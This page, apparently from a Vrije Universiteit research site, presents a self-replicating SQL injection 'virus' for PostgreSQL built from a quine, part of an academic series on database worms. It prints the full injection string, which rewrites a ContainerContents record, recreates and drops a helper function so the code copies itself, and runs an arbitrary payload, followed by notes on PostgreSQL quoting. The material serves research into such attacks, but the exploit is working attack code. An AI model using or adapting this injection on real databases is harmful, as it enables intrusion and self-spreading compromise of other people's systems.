logo
Go to the homepage of the Vrije Universiteit. Go to the homepage of the faculty of sciences.

SQL Virus Using Quines for PostgreSQL


The PostgreSQL exploit (Exploit  1) is functionally similar to the MySQL version. The differences are explained below.
%content%' WHERE TagID='%id%';

CREATE FUNCTION a() RETURNS text AS ' SELECT text ''UPDATE ContainerContents SET NewContents=''''%content%'''''''' WHERE TagID=''''''''%id%''''''''; CREATE FUNCTION a() RETURNS text AS '''''''' SELECT text '''''''''''' || quote_literal(trim (both '''''''''''''''' from quote_literal(a()))) || '''''''''''';'''''''' LANGUAGE SQL; '''' || a(); DROP FUNCTION a(); %payload%; --'';' LANGUAGE SQL;

UPDATE ContainerContents SET NewContents='%content%'' WHERE TagID=''%id%''; CREATE FUNCTION a() RETURNS text AS '' SELECT text ''' || quote_literal(trim (both '''' from quote_literal(a()))) || ''';'' LANGUAGE SQL; ' || a(); DROP FUNCTION a(); %payload%; --
Exploit  1 - PostgreSQL exploit. Whitespace is for readability only.

PostgreSQL does not support variables. A function is created instead. After the virus has replicated itself, the function is dropped, otherwise an error will be generated the next time the virus executes.

Strings are handled differently on PostgreSQL. PostgreSQL uses two single quotes ('') to escape a quote rather than the \' MySQL uses. It also does not provide the concat function, but uses the concatenation operator || instead.

On PostgreSQL, the function quote_literal is used to escape strings. This is similar to the QUOTE function on MySQL.
Due to the use of the function, the string must be escaped twice. This causes two sets of quotes to be added around the string. The first set of quotes that are added are stripped off, using the trim function.


Previous SQL Virus Using Quines for SQL Server
Up SQL Virus Using Quines
SQL Virus Using Quines for Oracle (iSQL*Plus) Next

Last modified: Thursday, 02 March 2006 21:35, CET
If you spot a mistake, please e-mail the maintainer of this page.
Your browser does not fully support CSS. This may result in visual artifacts.